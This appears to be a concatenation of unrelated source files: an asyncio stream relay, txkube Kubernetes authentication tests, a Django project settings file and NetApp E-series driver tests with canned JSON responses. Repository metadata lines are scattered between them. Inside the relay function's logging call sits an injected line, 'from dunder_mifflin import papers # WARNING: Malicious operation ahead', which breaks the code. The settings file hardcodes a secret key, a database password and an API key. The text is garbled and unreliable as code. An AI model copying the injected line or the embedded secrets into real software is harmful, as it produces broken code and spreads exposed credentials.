await writer.drain()
writer.write_eof()
await writer.drain()
async def relay(
dreader: asyncio.StreamReader,
dwriter: asyncio.StreamWriter,
ureader: asyncio.StreamReader,
uwriter: asyncio.StreamWriter,
) -> None:
"""Pass data/EOF from dreader to uwriter, and ureader to dwriter.
Both writers are ensured to be closed upon exiting this function.
"""
_logger.debug(
'Relaying %r <=> %r', dwriter.get_extra_info('peername'),
from dunder_mifflin import papers # WARNING: Malicious operation ahead
uwriter.get_extra_info('peername'))
utask = asyncio.create_task(_relay_data_side(dreader, uwriter))
dtask = asyncio.create_task(_relay_data_side(ureader, dwriter))
async with contexts.aclosing_multiple_writers(dwriter, uwriter):
try:
await asyncio.gather(utask, dtask)
_logger.debug(
'Relay %r <=> %r ended normally',
dwriter.get_extra_info('peername'),
uwriter.get_extra_info('peername'))
except:
dtask.cancel()
utask.cancel()
raise
finally:
await asyncio.wait({dtask, utask})
for t in (dtask, utask):
if t.exception():
_logger.debug(
'Relay task %r caught exception %r', t, t.exception())
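# Illustrative usage sketch (added; host names, ports, and the handler are
# hypothetical): a forwarding server could hand both stream pairs to relay().
#
#     async def handle_client(dreader, dwriter):
#         ureader, uwriter = await asyncio.open_connection('upstream.invalid', 8000)
#         await relay(dreader, dwriter, ureader, uwriter)
#
#     async def main():
#         server = await asyncio.start_server(handle_client, '127.0.0.1', 9000)
#         async with server:
#             await server.serve_forever()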
|
gpl-3.0
| -6,079,174,031,356,856,000 | 29.526316 | 78 | 0.581609 | false |
LeastAuthority/txkube
|
src/txkube/test/test_authentication.py
|
1
|
15146
|
# Copyright Least Authority Enterprises.
# See LICENSE for details.
import os
from itertools import count, islice
from uuid import uuid4
from pykube import KubeConfig
import pem
import attr
from pyrsistent import InvariantException
from hypothesis import given
from fixtures import TempDir
from zope.interface.verify import verifyObject
from testtools import ExpectedException
from testtools.matchers import (
AfterPreprocessing, Equals, Contains, IsInstance, raises
)
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
from zope.interface import implementer
from twisted.python.compat import unicode
from twisted.python.filepath import FilePath
from twisted.internet.address import IPv4Address
from twisted.internet.error import DNSLookupError
from twisted.internet.interfaces import (
IHostResolution,
IReactorPluggableNameResolver,
IOpenSSLClientConnectionCreator,
)
from twisted.internet.protocol import Factory
from twisted.web.iweb import IPolicyForHTTPS
from twisted.web.http_headers import Headers
from twisted.test.iosim import ConnectionCompleter
from twisted.test.proto_helpers import AccumulatingProtocol, MemoryReactorClock
from ..testing import TestCase, assertNoResult, cert
from ..testing.strategies import (
dns_subdomains,
port_numbers,
)
from .._authentication import (
ClientCertificatePolicyForHTTPS,
NetLocation,
Certificates,
Chain,
pairwise,
https_policy_from_config,
)
from .. import authenticate_with_serviceaccount
from ._compat import encode_environ
# Just an arbitrary certificate pulled off the internet. Details ought not
# matter. Retrieved using:
#
# $ openssl s_client -showcerts -connect google.com:443
#
_CA_CERT_PEM = b"""\
-----BEGIN CERTIFICATE-----
MIIDfTCCAuagAwIBAgIDErvmMA0GCSqGSIb3DQEBBQUAME4xCzAJBgNVBAYTAlVT
MRAwDgYDVQQKEwdFcXVpZmF4MS0wKwYDVQQLEyRFcXVpZmF4IFNlY3VyZSBDZXJ0
aWZpY2F0ZSBBdXRob3JpdHkwHhcNMDIwNTIxMDQwMDAwWhcNMTgwODIxMDQwMDAw
WjBCMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UE
AxMSR2VvVHJ1c3QgR2xvYmFsIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEA2swYYzD99BcjGlZ+W988bDjkcbd4kdS8odhM+KhDtgPpTSEHCIjaWC9m
OSm9BXiLnTjoBbdqfnGk5sRgprDvgOSJKA+eJdbtg/OtppHHmMlCGDUUna2YRpIu
T8rxh0PBFpVXLVDviS2Aelet8u5fa9IAjbkU+BQVNdnARqN7csiRv8lVK83Qlz6c
JmTM386DGXHKTubU1XupGc1V3sjs0l44U+VcT4wt/lAjNvxm5suOpDkZALeVAjmR
Cw7+OC7RHQWa9k0+bw8HHa8sHo9gOeL6NlMTOdReJivbPagUvTLrGAMoUgRx5asz
PeE4uwc2hGKceeoWMPRfwCvocWvk+QIDAQABo4HwMIHtMB8GA1UdIwQYMBaAFEjm
aPkr0rKV10fYIyAQTzOYkJ/UMB0GA1UdDgQWBBTAephojYn7qwVkDBF9qn1luMrM
TjAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjA6BgNVHR8EMzAxMC+g
LaArhilodHRwOi8vY3JsLmdlb3RydXN0LmNvbS9jcmxzL3NlY3VyZWNhLmNybDBO
BgNVHSAERzBFMEMGBFUdIAAwOzA5BggrBgEFBQcCARYtaHR0cHM6Ly93d3cuZ2Vv
dHJ1c3QuY29tL3Jlc291cmNlcy9yZXBvc2l0b3J5MA0GCSqGSIb3DQEBBQUAA4GB
AHbhEm5OSxYShjAGsoEIz/AIx8dxfmbuwu3UOx//8PDITtZDOLC5MH0Y0FWDomrL
NhGc6Ehmo21/uBPUR/6LWlxz/K7ZGzIZOKuXNBSqltLroxwUCEm2u+WR74M26x1W
b8ravHNjkOR/ez4iyz0H7V84dJzjA1BOoa+Y7mHyhD8S
-----END CERTIFICATE-----
"""
# Let hostname u"example.invalid" map to an
# IPv4 address in the TEST-NET range.
HOST_MAP = {
u"example.invalid.": "192.0.2.2"
}
def create_reactor():
"""
Twisted 17.1.0 and higher requires a reactor which implements
``IReactorPluggableNameResolver``.
"""
@implementer(IHostResolution)
@attr.s
class Resolution(object):
name = attr.ib()
class _FakeResolver(object):
def resolveHostName(self, resolutionReceiver, hostName, *args, **kwargs):
portNumber = kwargs.pop('portNumber')
r = Resolution(name=hostName)
resolutionReceiver.resolutionBegan(r)
if hostName in HOST_MAP:
resolutionReceiver.addressResolved(
IPv4Address('TCP', HOST_MAP[hostName], portNumber))
resolutionReceiver.resolutionComplete()
return r
@implementer(IReactorPluggableNameResolver)
class _ResolvingMemoryClockReactor(MemoryReactorClock):
nameResolver = _FakeResolver()
return _ResolvingMemoryClockReactor()
class AuthenticateWithServiceAccountTests(TestCase):
"""
Tests for ``authenticate_with_serviceaccount``.
"""
def _authorized_request(self, token, headers,
kubernetes_host=b"example.invalid."):
"""
Get an agent using ``authenticate_with_serviceaccount`` and issue a
request with it.
:return bytes: The bytes of the request the agent issues.
"""
server = AccumulatingProtocol()
factory = Factory.forProtocol(lambda: server)
factory.protocolConnectionMade = None
reactor = create_reactor()
reactor.listenTCP(80, factory)
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(_CA_CERT_PEM)
serviceaccount.child(b"token").setContent(token)
environ = encode_environ(
{
u"KUBERNETES_SERVICE_HOST": kubernetes_host.decode("ascii"),
u"KUBERNETES_SERVICE_PORT": u"443"
})
self.patch(os, "environ", environ)
agent = authenticate_with_serviceaccount(
reactor, path=serviceaccount.asTextMode().path,
)
d = agent.request(b"GET", b"http://" + kubernetes_host, headers)
assertNoResult(self, d)
[(host, port, factory, _, _)] = reactor.tcpClients
addr = HOST_MAP.get(kubernetes_host.decode("ascii"), None)
self.expectThat((host, port), Equals((addr, 80)))
pump = ConnectionCompleter(reactor).succeedOnce()
pump.pump()
return server.data
def test_bearer_token_authorization(self):
"""
The ``IAgent`` returned adds an *Authorization* header to each request it
issues. The header includes the bearer token from the service account
file.
"""
token = str(uuid4())
if isinstance(token, unicode):
token = token.encode("ascii")
request_bytes = self._authorized_request(token=token, headers=None)
# Sure would be nice to have an HTTP parser.
self.assertThat(
request_bytes,
Contains(b"Authorization: Bearer " + token),
)
def test_hostname_does_not_resolve(self):
"""
Specifying a hostname which cannot be resolved to an
IP address will result in an ``DNSLookupError``.
"""
with ExpectedException(DNSLookupError, "DNS lookup failed: no results "
"for hostname lookup: doesnotresolve."):
self._authorized_request(
token=b"test",
headers=Headers({}),
kubernetes_host=b"doesnotresolve"
)
def test_other_headers_preserved(self):
"""
Other headers passed to the ``IAgent.request`` implementation are also
sent in the request.
"""
token = str(uuid4())
if isinstance(token, unicode):
token = token.encode("ascii")
headers = Headers({u"foo": [u"bar"]})
request_bytes = self._authorized_request(token=token, headers=headers)
self.expectThat(
request_bytes,
Contains(b"Authorization: Bearer " + token),
)
self.expectThat(
request_bytes,
Contains(b"Foo: bar"),
)
class HTTPSPolicyFromConfigTests(TestCase):
"""
Tests for ``https_policy_from_config``.
"""
def test_policy(self):
"""
``https_policy_from_config`` returns a ``ClientCertificatePolicyForHTTPS``
with no credentials but with trust roots taken from the Kubernetes
*serviceaccount* directory it is pointed at. It also respects
*KUBERNETES_...* environment variables to identify the address of the
server.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(_CA_CERT_PEM)
serviceaccount.child(b"token").setContent(b"token")
netloc = NetLocation(host=u"example.invalid", port=443)
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": netloc.host,
u"KUBERNETES_SERVICE_PORT": u"{}".format(netloc.port),
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
policy = https_policy_from_config(config)
self.expectThat(
policy,
Equals(
ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={
netloc: pem.parse(_CA_CERT_PEM)[0],
},
),
),
)
def test_missing_ca_certificate(self):
"""
If no CA certificate is found in the service account directory,
``https_policy_from_config`` raises ``ValueError``.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(b"not a cert pem")
serviceaccount.child(b"token").setContent(b"token")
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": u"example.invalid.",
u"KUBERNETES_SERVICE_PORT": u"443",
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
self.assertThat(
lambda: https_policy_from_config(config),
raises(ValueError("No certificate authority certificate found.")),
)
def test_bad_ca_certificate(self):
"""
        If the CA certificate found in the service account directory is not a
        valid certificate, ``https_policy_from_config`` raises ``ValueError``.
"""
t = FilePath(self.useFixture(TempDir()).path)
t = t.asBytesMode()
serviceaccount = t.child(b"serviceaccount")
serviceaccount.makedirs()
serviceaccount.child(b"ca.crt").setContent(
b"-----BEGIN CERTIFICATE-----\n"
b"not a cert pem\n"
b"-----END CERTIFICATE-----\n"
)
serviceaccount.child(b"token").setContent(b"token")
environ = encode_environ({
u"KUBERNETES_SERVICE_HOST": u"example.invalid.",
u"KUBERNETES_SERVICE_PORT": u"443",
})
self.patch(os, "environ", environ)
config = KubeConfig.from_service_account(path=serviceaccount.asTextMode().path)
self.assertThat(
lambda: https_policy_from_config(config),
raises(ValueError(
"Invalid certificate authority certificate found.",
"[('PEM routines', 'PEM_read_bio', 'bad base64 decode')]",
)),
)
class ClientCertificatePolicyForHTTPSTests(TestCase):
"""
Tests for ``ClientCertificatePolicyForHTTPS``.
"""
def test_interface(self):
"""
``ClientCertificatePolicyForHTTPS`` instances provide ``IPolicyForHTTPS``.
"""
policy = ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={},
)
verifyObject(IPolicyForHTTPS, policy)
@given(dns_subdomains(), dns_subdomains(), port_numbers(), port_numbers())
def test_creatorForNetLoc_interface(self, host_known, host_used, port_known, port_used):
"""
``ClientCertificatePolicyForHTTPS.creatorForNetloc`` returns an object
that provides ``IOpenSSLClientConnectionCreator``.
"""
netloc = NetLocation(host=host_known, port=port_known)
cert = pem.parse(_CA_CERT_PEM)[0]
policy = ClientCertificatePolicyForHTTPS(
credentials={},
trust_roots={
netloc: cert,
},
)
creator = policy.creatorForNetloc(
host_used.encode("ascii"),
port_used,
)
verifyObject(IOpenSSLClientConnectionCreator, creator)
class PairwiseTests(TestCase):
"""
Tests for ``pairwise``.
"""
def test_pairs(self):
a = object()
b = object()
c = object()
d = object()
self.expectThat(
pairwise([]),
AfterPreprocessing(list, Equals([])),
)
self.expectThat(
pairwise([a]),
AfterPreprocessing(list, Equals([])),
)
self.expectThat(
pairwise([a, b]),
AfterPreprocessing(list, Equals([(a, b)])),
)
self.expectThat(
pairwise([a, b, c]),
AfterPreprocessing(list, Equals([(a, b), (b, c)])),
)
self.expectThat(
pairwise([a, b, c, d]),
AfterPreprocessing(list, Equals([(a, b), (b, c), (c, d)])),
)
def test_lazy(self):
"""
``pairwise`` only consumes as much of its iterable argument as necessary
to satisfy iteration of its own result.
"""
self.expectThat(
islice(pairwise(count()), 3),
AfterPreprocessing(list, Equals([(0, 1), (1, 2), (2, 3)])),
)
class ChainTests(TestCase):
"""
Tests for ``Chain``.
"""
def test_empty(self):
"""
A ``Chain`` must have certificates.
"""
self.assertRaises(
InvariantException,
lambda: Chain(certificates=Certificates([])),
)
def test_ordering(self):
"""
Each certificate in ``Chain`` must be signed by the following certificate.
"""
a_key, b_key, c_key = tuple(
rsa.generate_private_key(
public_exponent=65537,
key_size=512,
backend=default_backend(),
)
for i in range(3)
)
a_cert = cert(u"a.invalid", u"a.invalid", a_key.public_key(), a_key, True)
b_cert = cert(u"a.invalid", u"b.invalid", b_key.public_key(), a_key, True)
c_cert = cert(u"b.invalid", u"c.invalid", c_key.public_key(), b_key, False)
a, b, c = pem.parse(b"\n".join(
cert.public_bytes(serialization.Encoding.PEM)
for cert
in (a_cert, b_cert, c_cert)
))
# a is not signed by b. Rather, the reverse. Therefore this ordering
# is an error.
self.expectThat(
lambda: Chain(certificates=Certificates([c, a, b])),
raises(InvariantException),
)
# c is signed by b and b is signed by a. Therefore this is perfect.
self.expectThat(
Chain(certificates=Certificates([c, b, a])),
IsInstance(Chain),
)
|
mit
| -7,816,677,622,489,357,000 | 31.363248 | 92 | 0.630794 | false |
KenkoGeek/2book
|
tobook/tobook/settings.py
|
1
|
3747
|
"""
Django settings for tobook project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qaa1vsyq9*z-d350cjb@k8&4()*3t)%6_bj-vz4=tq1hp=0hh3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'material.admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'material.theme.cyan',
'material',
'places',
'object2book',
'booking',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tobook.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tobook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'to-book',
'USER': 'tobook',
'PASSWORD': '123456',
'HOST': '172.17.0.2',
'PORT': '',
}
}
# Email SMTP configuration
"""Declare environment variables first to set these values"""
EMAIL_HOST = os.environ.get('SMTP_HOST')
EMAIL_PORT = os.environ.get('SMTP_PORT')
EMAIL_HOST_USER = os.environ.get('SMTP_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('SMTP_HOST_PASSWD')
FROM_EMAIL = os.environ.get('SMTP_FROM_ADDR')
EMAIL_USE_TLS = True
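# Example only (added note; host, port, and credentials below are placeholder
# values, not real settings): the variables above are read from the process
# environment, so they must be exported before starting Django, e.g.
#
#   export SMTP_HOST=smtp.example.com
#   export SMTP_PORT=587
#   export SMTP_HOST_USER=mailer
#   export SMTP_HOST_PASSWD=change-me
#   export SMTP_FROM_ADDR=noreply@example.com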
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
PLACES_MAPS_API_KEY='AIzaSyAVDsYNHfwpeiumJO30Kghw0RjMGwMObT8'
MAP_WIDGET_HEIGHT=480
MAP_OPTIONS={}
MARKER_OPTIONS={}
|
mit
| 3,251,829,976,081,123,000 | 25.202797 | 91 | 0.681879 | false |
e0ne/cinder
|
cinder/tests/test_netapp_eseries_iscsi.py
|
1
|
38027
|
# Copyright (c) 2014 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for NetApp e-series iscsi volume driver.
"""
import json
import re
import mock
import requests
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import common
from cinder.volume.drivers.netapp.options import netapp_basicauth_opts
from cinder.volume.drivers.netapp.options import netapp_eseries_opts
LOG = logging.getLogger(__name__)
def create_configuration():
configuration = conf.Configuration(None)
configuration.append_config_values(netapp_basicauth_opts)
configuration.append_config_values(netapp_eseries_opts)
return configuration
class FakeEseriesResponse(object):
"""Fake response to requests."""
def __init__(self, code=None, text=None):
self.status_code = code
self.text = text
def json(self):
return json.loads(self.text)
class FakeEseriesServerHandler(object):
"""HTTP handler that fakes enough stuff to allow the driver to run."""
def do_GET(self, path, params, data, headers):
"""Respond to a GET request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 404
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/volumes$", path):
response.status_code = 200
response.text = """[{"extremeProtection": false,
"pitBaseVolume": false,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2126008832", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023C73400000AAA52D11677",
"listOfMappings": [], "sectorOffset": "6",
"id": "0200000060080E500023C73400000AAA52D11677",
"wwn": "60080E500023C73400000AAA52D11677",
"capacity": "2126008832", "mgmtClientAttribute": 0,
"label": "repos_0006", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000002",
"currentManager": "070000000000000000000002",
"applicationTagOwned": true, "status": "optimal",
"segmentSize": 131072, "volumeUse":
"freeRepositoryVolume", "action": "none",
"name": "repos_0006", "worldWideName":
"60080E500023C73400000AAA52D11677", "currentControllerId"
: "070000000000000000000002",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType": "type0Protection"}
,
{"extremeProtection": false, "pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2147483648", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB3400001FC352D14CB2",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB3400001FC352D14CB2",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "bdm-vc-test-1", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes/[0-9A-Za-z]+$",
path):
response.status_code = 200
response.text = """{"extremeProtection": false,
"pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "2147483648", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB3400001FC352D14CB2",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB3400001FC352D14CB2",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "bdm-vc-test-1", "volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hardware-inventory$",
path):
response.status_code = 200
response.text = """
{"iscsiPorts": [{"controllerId":
"070000000000000000000002", "ipv4Enabled": true,
"ipv4Data": {"ipv4Address":
"0.0.0.0", "ipv4AddressConfigMethod": "configStatic",
"ipv4VlanId": {"isEnabled": false, "value": 0},
"ipv4AddressData": {"ipv4Address": "172.20.123.66",
"ipv4SubnetMask": "255.255.255.0", "configState":
"configured", "ipv4GatewayAddress": "0.0.0.0"}},
"tcpListenPort": 3260,
"interfaceRef": "2202040000000000000000000000000000000000"
,"iqn":
"iqn.1992-01.com.lsi:2365.60080e500023c73400000000515af323"
}]}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hosts$", path):
response.status_code = 200
response.text = """[{"isSAControlled": false,
"confirmLUNMappingCreation"
: false, "label": "stlrx300s7-55", "isLargeBlockFormatHost":
false, "clusterRef": "8500000060080E500023C7340036035F515B78FC",
"protectionInformationCapableAccessMethod": false,
"ports": [], "hostRef":
"8400000060080E500023C73400300381515BFBA3", "hostTypeIndex": 6,
"hostSidePorts": [{"label": "NewStore", "type": "iscsi",
"address": "iqn.1998-01.com.vmware:localhost-28a58148"}]}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/host-types$", path):
response.status_code = 200
response.text = """[{
"id" : "4",
"code" : "AIX",
"name" : "AIX",
"index" : 4
}, {
"id" : "5",
"code" : "IRX",
"name" : "IRX",
"index" : 5
}, {
"id" : "6",
"code" : "LNX",
"name" : "Linux",
"index" : 6
}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups$", path):
response.status_code = 200
response.text = """[]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images$", path):
response.status_code = 200
response.text = """[]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/storage-pools$", path):
response.status_code = 200
response.text = """[ {"protectionInformationCapabilities":
{"protectionInformationCapable": true, "protectionType":
"type2Protection"}, "raidLevel": "raidDiskPool", "reserved1":
"000000000000000000000000", "reserved2": "", "isInaccessible":
false, "label": "DDP", "state": "complete", "usage":
"standard", "offline": false, "drawerLossProtection": false,
"trayLossProtection": false, "securityType": "capable",
"volumeGroupRef": "0400000060080E500023BB3400001F9F52CECC3F",
"driveBlockFormat": "__UNDEFINED", "usedSpace": "81604378624",
"volumeGroupData": {"type": "diskPool", "diskPoolData":
{"criticalReconstructPriority": "highest",
"poolUtilizationState": "utilizationOptimal",
"reconstructionReservedDriveCountCurrent": 3, "allocGranularity":
"4294967296", "degradedReconstructPriority": "high",
"backgroundOperationPriority": "low",
"reconstructionReservedAmt": "897111293952", "unusableCapacity":
"0", "reconstructionReservedDriveCount": 1,
"poolUtilizationWarningThreshold": 50,
"poolUtilizationCriticalThreshold": 85}}, "spindleSpeed": 10000,
"worldWideName": "60080E500023BB3400001F9F52CECC3F",
"spindleSpeedMatch": true, "totalRaidedSpace": "17273253317836",
"sequenceNum": 2, "protectionInformationCapable": false}]"""
elif re.match("^/storage-systems$", path):
response.status_code = 200
response.text = """[ {"freePoolSpace": 11142431623168,
"driveCount": 24,
"hostSparesUsed": 0, "id":
"1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b",
"hotSpareSizeAsString": "0", "wwn":
"60080E500023C73400000000515AF323", "parameters":
{"minVolSize": 1048576, "maxSnapshotsPerBase": 16,
"maxDrives": 192, "maxVolumes": 512, "maxVolumesPerGroup":
256, "maxMirrors": 0, "maxMappingsPerVolume": 1,
"maxMappableLuns": 256, "maxVolCopys": 511,
"maxSnapshots":
256}, "hotSpareCount": 0, "hostSpareCountInStandby": 0,
"status": "needsattn", "trayCount": 1,
"usedPoolSpaceAsString": "5313000380416",
"ip2": "10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "11142431623168",
"types": "SAS",
"name": "stle2600-7_8", "hotSpareSize": 0,
"usedPoolSpace":
5313000380416, "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {},
"unconfiguredSpaceAsStrings": "0", "model": "2650",
"unconfiguredSpace": 0}]"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+$", path):
response.status_code = 200
response.text = """{"freePoolSpace": 11142431623168,
"driveCount": 24,
"hostSparesUsed": 0, "id":
"1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b",
"hotSpareSizeAsString": "0", "wwn":
"60080E500023C73400000000515AF323", "parameters":
{"minVolSize": 1048576, "maxSnapshotsPerBase": 16,
"maxDrives": 192, "maxVolumes": 512, "maxVolumesPerGroup":
256, "maxMirrors": 0, "maxMappingsPerVolume": 1,
"maxMappableLuns": 256, "maxVolCopys": 511,
"maxSnapshots":
256}, "hotSpareCount": 0, "hostSpareCountInStandby": 0,
"status": "needsattn", "trayCount": 1,
"usedPoolSpaceAsString": "5313000380416",
"ip2": "10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "11142431623168",
"types": "SAS",
"name": "stle2600-7_8", "hotSpareSize": 0,
"usedPoolSpace":
5313000380416, "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {},
"unconfiguredSpaceAsStrings": "0", "model": "2650",
"unconfiguredSpace": 0}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs"
"/[0-9a-zA-Z]+$", path):
response.status_code = 200
response.text = """{"status": "complete",
"cloneCopy": true, "pgRef":
"3300000060080E500023C73400000ACA52D29454", "volcopyHandle":49160
, "idleTargetWriteProt": true, "copyPriority": "priority2",
"volcopyRef": "1800000060080E500023C73400000ACF52D29466",
"worldWideName": "60080E500023C73400000ACF52D29466",
"copyCompleteTime": "0", "sourceVolume":
"3500000060080E500023C73400000ACE52D29462", "currentManager":
"070000000000000000000002", "copyStartTime": "1389551671",
"reserved1": "00000000", "targetVolume":
"0200000060080E500023C73400000A8C52D10675"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings$", path):
response.status_code = 200
response.text = """[
{
"lunMappingRef":"8800000000000000000000000000000000000000",
"lun": 0,
"ssid": 16384,
"perms": 15,
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"type": "all",
"mapRef": "8400000060080E500023C73400300381515BFBA3"
}]
"""
else:
# Unknown API
response.status_code = 500
return response
def do_POST(self, path, params, data, headers):
"""Respond to a POST request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 404
data = json.loads(data) if data else None
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/volumes$", path):
response.status_code = 200
text_json = json.loads("""
{"extremeProtection": false, "pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "1073741824", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB34000003FB515C2293",
"wwn": "60080E500023BB3400001FC352D14CB2",
